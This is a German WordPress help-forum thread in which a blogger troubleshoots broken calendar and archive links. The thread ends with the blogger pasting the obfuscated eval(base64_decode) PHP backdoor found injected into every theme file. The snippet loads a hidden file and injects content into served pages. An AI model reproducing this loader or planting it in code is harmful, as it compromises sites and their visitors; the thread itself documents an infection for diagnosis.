Beiträge von BET65

    Hallo Gemeinde,

    bin Wordpress-Neuling und habe mal ne Frage.
    Ich erstelle gerade ein Menü aus Kategorien und Seiten, von denen einige auch ein Untermenü haben sollen. Nun möchte ich aber verhindern, dass sich beim Anklicken eines Menüpunktes (hinter dem eine Kategorie liegt) ein Link öffnet. Es sollen nur die Untermenüs (durch einen Mouse-Over-Effekt, der schon geht) aufklappen - ohne das dieses Menübutton klickbar ist.
    War das verständlich?:roll:

    Am Liebsten wäre mir ein Plugin für sowas, da ich nicht coden kann und ich die Funktion für mehrere Kategorien brauche.

    Ich hab das schon mit einen "toten" Link geschafft, aber dann den kann ich mit meinem Übersetzungs-Plugin dann nicht übersetzen.

    Hi MarX,

    also erst Mal noch mal sorry, dass ich diese Codezeile nicht gleich gepostet habe, aber ich dachte halt ..... (siehe oben). Wie auch immer.

    Nachdem du mir nun den Pfad genannt hast, bin ich ja gleich doppelt überrascht, denn dieser verweist auf das alte und nicht mehr aktive Blog hin - also das, wo ich diese Probleme ja auch schon hatte.
    Weil ich damals nicht weiter wusste, habe ich ja eine neue Datenbank und einen neuen Blog aufgemacht. Da bekam ich dieselben Probleme.

    Ich wäre nie auf die Idee gekommen, dass das Problem also im alten, brach liegenden Blog liegen könnte, daher habe ich dir auch keine Dateien aus diesem alten Blog gepostet, sondern nur die neuen.

    Ich hab den Schadcode jetzt überall rausgenommen (aus dem neuen Blog). Den alten Blog lasse ich so lange drin, bis mein Supporter überprüft hat woher der Mist gekommen ist und ob es da eine Sicherheitslücke gibt. Dann werde ich das Blog und die Datenbank löschen. Sorry aber so verzwickt habe ich nicht gedacht. :oops:

    Hab jetzt auch das Theme gecheckt und weiß zumindest, warum ich das Problem schon wieder hatte. Hab beim Neuaufbau offensichtlich das schon schadhafte Theme verwendet, anstatt es neu herunterzuladen.

    Das wird mir eine Lehre sein!

    Gruß
    BET65

    Verflucht! Das war's!

    Ich glaub's ja gar nicht.

    Problem behoben!

    marX
    Jetzt muss ich aber noch was beichten! :oops: Diesen Code hatte ich in jeder Datei des Nebula-Themes. Ich hatte diesen bei den zuvor geposteten Dateien aber immer rausgenommen, weil ich ahnungsloser Trottel dachte, dies wäre irgendeine Art von Sicherheitscode in meinem Blog - so mit Verschlüsselung von Zugangsdaten oder so. Ich hab's erst jetzt bei der wp-config drin gelassen, weil da ja auch die Serverdaten drin stehen, die ich ja auch durch "XYZ" ersetzt habe. Daher habe ich auch in diesem vermeintlichen "Sicherheitscode" die Daten durch "XYZ" ersetzt. I'm so sorry!!!!!
    Vermutlich hättest du das Problem schon lange lösen können, wenn ich das vorher schon gepostet hätte.
    Da ich im Sommer schon einmal dasselbe Problem hatte, musste ich für meinen "Schlendrian" ja schon büßen und hatte da ja das ganze Blog neu geschrieben.Vielen Dank an euch beide.Hat bestimmt Nerven gekostet, gell? :grin:

    Und hier nun der komplette Codeschnipsel, der den ganzen Ärger erzeugt hat.

    PHP
    <? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCJvYl9zdGFydCIpICYmICFpc3NldCgkR0xPQkFMU1sic2hfbm8iXSkpeyRHTE9CQUxTWyJzaF9ubyJdPTE7JFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2Qj0iL2t1bmRlbi9ob21lcGFnZXMvMTUvZDEzNTg4MDQ0L2h0ZG9jcy9uZXdzYmxvZy93cC1pbmNsdWRlcy9qcy90aW55bWNlL3RoZW1lcy9hZHZhbmNlZC9pbWFnZXMveHAvanMucGhwIjtpZihmaWxlX2V4aXN0cygkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCKSl7aW5jbHVkZV9vbmNlKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkIpO31pZighZnVuY3Rpb25fZXhpc3RzKCJnemRlY29kZSIpKXtmdW5jdGlvbiBnemRlY29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9dW5wYWNrKCJ2IixzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0kUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0dXJuICRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1pZihmdW5jdGlvbl9leGlzdHMoImdtbCIpICYmICFmdW5jdGlvbl9leGlzdHMoImRnb2JoIikpe2Z1bmN0aW9uIGRnb2JoKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0Ype0hlYWRlcigiQ29udGVudC1FbmNvZGluZzogbm9uZSIpOyRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTA9Z3pkZWNvZGUoJFJEQTNFNjE0MTRFNTBBRUU5NjgxMzJGMDNEMjY1RTBDRik7aWYocHJlZ19tYXRjaCgiL1w8Ym9keS9zaSIsJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCkpe3JldHVybiBwcmVnX3JlcGxhY2UoIi8oXDxib2R5W15cPl0qXD4pL3NpIiwiJDEiLmdtbCgpLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApO31lbHNle3JldHVybiBnbWwoKS4kUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwO319b2Jfc3RhcnQoImRnb2JoIik7fX0=')); ?>

    Wo der allerdings herkommt, weiß ich nicht. Ist mein Blog gehackt worden? Heißt das, dass der Server von 1und1 ein Sicherheitsloch hat?
    Ich werde dies auf jeden Fall auch an meinen "Platin-Supporter" mailen.

    Nochmals DANKE!

    Gruß
    BET65

    So,

    hier mal die wp-config.php:

    Die drei Secret Keys habe ich heute erst eingebaut. Wusste nicht, dass man das beim Upgraden machen sollte. Könnte dies das Problem gewesen sein?

    In der wp-content stehen folgende Ordner:
    - languages
    - plugins
    - themes
    - uploads
    und die datei index.php

    In den Ordnern scheint nichts Ungewöhnliches drin zu sein. Außer beim Ordner "uploads". Dort ist ein Ordner "js_cache" und darin die Datei "tinymce_f8f442f3ffa223c364442defc04e299a.gz". Was ist das und gehört das dahin?

    Ich hab nun auch alle Themes außer Nebula gelöscht. Keine Änderung!

    Gruß
    BET65

    Ok,

    zu 1.

    Zitat

    1.) Einen falschen Eintrag in der MySQL Datenbank

    Von MySQL-Datenbanken hab ich leider nicht genug Ahnung,um das beurteilen zu können. Dagegen spricht aber wohl eher auch die Tatsache, dass ich das gleiche Problem schon einmal mit einem anderen WP-Blog hatte - auch bei 1und1. Und der lief auf einer anderen Datenbank.

    Zu 2.

    Zitat

    2.) Ein Problem mit dem Quelltext des Blogs selbst

    Das sehe ich genauso. Habe beim Upgrade alles außer der wp-content und der wp-config.php gelöscht. Kann man diese denn eigentlich auch ersetzen/upgraden oder so?

    Zu 3.

    Zitat

    3.) Eventuell ein erfolgreicher Hack Angriff auf Ihren Blog

    Kann dann wohl auch nur in der wp-content oder der wp-conifg gehackt worden sein, da alles andere neu ist. Aber wenn ich ein Blog erfolgreich hacken wollen würde, würde ich ja auch in der wp-content hacken, da man die beim Upgraden ja behält, oder?

    Zu 4.

    Zitat

    4.) Eine fehlende Datei die durch den Blog nicht geladen werden kann

    Dito. Sehe ich genauso.

    Ergo:
    bleiben demnach (vorerst) zwei Möglichkeiten:

    a) Problem in der wp-content oder der wp-config. Kann ich diese auch upgraden oder ersetzen, ohne die Daten der Datenbank zu verlieren?

    b) Blog ist in der wp-content oder der wp-config gehackt. Wie kann ich das feststellen und was kann ich dagegen tun?

    Auf dem Webspace laufen noch drei weitere Scripte. Zwei Foren und der alte Blog stehen da noch drin. Haben aber alle eine eigene MySQL-Datenbank.

    Ich nerve langsam gell?

    Gruß
    BET65

    Hi,

    so - Ende der Fahnenstange! Mein Supporter schickte mir folgende Mail:

    Hat sich wohl nicht getraut mir das persönlich zu sagen.

    Und was jetzt?

    Hat hier vielleicht noch jemand eine Idee?


    Gruß
    BET65

    Hi MarX,

    der Supporter hat auch hier im Forum den Beitrag von uns gelesen. Er wird jetzt mal in den log-Dateien rumstochern.

    Er meinte auch es könnte an dem m-Paramter liegen. Wenn man statt dem "?m" mal ein "?a" eingibt - also direkt im Web-Browser - kommt eine sehr seltsame Liste zu Tage, die mit den Inhalten meines Blogs absolut nix zu tun hat! ??????????

    z.B. bei folgendem Link: http://www.andreas-schoenfeld.de/blog/?a=1

    Da staune ich echt! Wie kommt so ein Müll auf "meinen" Server????????

    Ist echt zum Mäusemelken.....

    Hi Leute,
    zur aktuellen Entwicklung des Problems: es besteht nach wie vor! :(

    Habe gerade mit dem zuständigen Supportmitarbeiter von 1und1 telefoniert. Er kann das Problem auch nicht finden! :(

    Sein übergeordneter Chef auch nicht! :(

    Also - wenn das nicht nach einer Herausforderung für euch klingt.

    Bitte helft mir! Bin mit meinem Latein am Ende! Ich brauch meinen Blog und die Gemeinschaft der Triker in Deutschland auch!

    Gruß
    BET65

    Hi,

    ja ich habe alles gelöscht - außer den genannten Ordnern/Dateien - habs genauso gemacht, wie in deinem Link beschrieben.

    Hab dann alle neuen Daten per FTP wieder hochgeladen. Außer dem neuen Ordner wp-content, denn da hatte ich ja den "alten".

    ??????????????

    Vielleicht hat hier jemand anders noch eine Idee was ich machen kann?

    Danke dir erst Mal sehr für deine Bemühungen MarX! :-D

    Wende mich jetzt auch parallel mal an den Support meines Providers.

    Gruß
    BET65

    Sodele,

    hab' jetzt auf die Version 2.6.3 DE-Edition aktualisiert.
    und......

    der Fehler ist immer noch da! :cry:

    Die errorlog-Datei bei meinem Provider konnte ich übrigens auch nicht finden. Hab' keine Ahnung wo 1und1 so was "versteckt". :cry:

    Ist mir noch zu helfen????

    Gruß
    BET65

    Ok - einen hab ich noch -

    vielleicht hilft's den Fachleuten bei der Fehlersuche.

    Hab gerade versucht den letzten (und auch den vorletzten) Beitrag zu löschen. Beim Klicken auf den "Löschen"-Button im WordPress-Admin-Bereich erschien dieselbe Auflistung von URL's wie im ersten Beitrag schon beschrieben:

    "http://www.andreas-schoenfeld.de/blog/?show-id=0
    http://www.andreas-schoenfeld.de/blog/?show-id=1
    http://www.andreas-schoenfeld.de/blog/?show-id=2
    http://www.andreas-schoenfeld.de/blog/?show-id=3"
    usw, usf ......

    Das kam mir schon ungewöhnlich vor....?????!!!!!

    Gruß vom ratlosen
    BET65

    Hi,

    ok. Danke erst mal.
    Im Übrigen hab ich mal in die erwähnte FAQ geschaut.

    - Der Fehler tritt in allen Themes auf.
    - Nein, ich habe das Theme nicht bearbeitet.
    - Den letzten Beitrag habe ich überprüft.
    - Mein Provider hat sich nicht gemeldet.
    - und nein - ich habe keinen kleinen Bruder! ;-)

    Das Blog läuft übrigens in einer MySQL 5.0 Umgebung.
    Das andere Blog, bei dem ich den Fehler schon einmal hatte lief aber und 4.0. Kann also auch nichts bedeuten - denke ich.

    Werde mir dann mal den Rest der Nacht um die Ohren hauen - mit dem verd...... Problem.

    Danke und Gute Nacht

    BET65

    Ups,

    muss mich korrigieren.
    Ich hab damals nicht nur das Theme neu aufgebaut, sondern das gesamte Blog. Einschließlich neuer Datenbank und neuem Verzeichnis usw.....

    Sorry - das Alter trübt meine Erinnerung gelegentlich.


    Die Kalender- und Archiv-Funktionen funktionierten auch schon monatelang.

    Der "Rest" von meiner Homepage ist statisches HTML. Das sollte es keine Probleme geben. Bei meinem Hoster (1und1) sind aber noch andere SQL-Datenbanken (ein PHPBB2-Forum, das alte Weblog, ein Wiki das in Arbeit ist und ein altes Board). Die liegen aber all in getrennten Verzeichnisbäumen. Ich denke daher nicht, dass die sich stören - weiß ich aber auch nicht so genau.

    Ich such jetzt mal das logfile. Hab nur keinen Schimmer, wo ich das finde. Mal sehen....

    Gruß
    BET65

    Also aufgefallen ist mir das Problem erst heute.
    Da habe ich einfach - wie immer - einen neuen Beitrag verfasst und gepostet. Editiert (also im Theme-Editor oder so) habe ich da nix.

    Vor längerer Zeit hatte ich das Problem schon einmal. Da wusste ich nicht weiter und hab ein neues Theme - nämlich Nebula - installiert. Danach ging alles. Jetzt hab ich schon wieder das Prob. GRRRRRR.

    Mich wundert es, da ich mir keiner "Schuld" bewusst bin und weil die "Kategorie"-Links ja nach wie vor funktionieren.

    Im error-log des Web-Servers nachschauen?????? Na jetzt wird's ja lustig. :-(
    Muss ich erst mal gucken wie und wo das geht und ob mir die Log-Datei überhaupt irgendwas sagt, was ich verstehe.

    Dennoch Danke für deine Hilfeversuche.

    Gruß
    BET65

    Okay,

    Danke. Ich probier das mit dem Anlegen der date.php gleich mal aus.

    Hier schon mal die functions.php aus dem nebula-Theme:

    PHP
    <?php
    if ( function_exists('register_sidebar') )
        register_sidebars(2);
    ?>

    An Plugins laufen:
    Akismet 2.1.4
    Hello Dolly 1.5
    Beide haben aber den Status "inaktiv".

    Gruß
    BET65

    Okay,

    hier die index.php aus dem Verzeichnis "nebula-10":

    und hier die header.php: (die lag im Verzeichnis des "classic"-Themes)

    und noch eine andere header.php (im Verzeichnis "default"):

    und noch eine header.php aus dem Verzeichnis "default_de":

    Sorry - hab leider keine Ahnung welche davon gebaucht wird, aber im Verzeichnis mit dem Nebula-10-Theme ist keine header.php.

    Gruß
    BET65

    Hi,

    Danke für die schnelle Antwort.
    Also mein Theme enthält nur die folgenden Seiten:
    comments.php
    functions.php
    index.php
    links.php
    sidebar.php
    sidebar2.php
    style.css

    Das sind zumindest die Seiten, die ich im Theme-Editor editieren kann.

    Keine archive.php und keine date.php.:-(

    Gruß
    BET65

    Hallo,

    ich habe ein Problem mit meinem Blog und hoffe nun hier auf Hilfe, da ich nicht mehr weiter weiß.
    Ich habe WordPress 2.5.1 installiert (glaub ich) :-| und nutze das Theme Nebula-10.
    Nun zum Problem:
    Hab heute gemerkt, dass ich beim Anklicken eines Termins im "Kalender" und beim Anklicken eines Links im "Archiv" nur noch diese Meldung angezeigt bekomme:
    "http://www.andreas-schoenfeld.de/blog/?show-id=0
    http://www.andreas-schoenfeld.de/blog/?show-id=1
    http://www.andreas-schoenfeld.de/blog/?show-id=2
    http://www.andreas-schoenfeld.de/blog/?show-id=3
    http://www.andreas-schoenfeld.de/blog/?show-id=4
    http://www.andreas-schoenfeld.de/blog/?show-id=5
    http://www.andreas-schoenfeld.de/blog/?show-id=6
    ..... usw"

    Es wird quasi nur noch die URL angezigt, aber keine HTML-Seite mit den angeforderten Daten.

    Hat jemand eine Ahnung, was mir da passiert ist? Denn es ging ja die ganze Zeit.
    Zu sehen ist das ganze unter: Black Eagle Triker und dort dann links auf "News" klicken.

    Hier ist die zugehörige sidebar.php (vielleichts hilfts bei der Hilfe):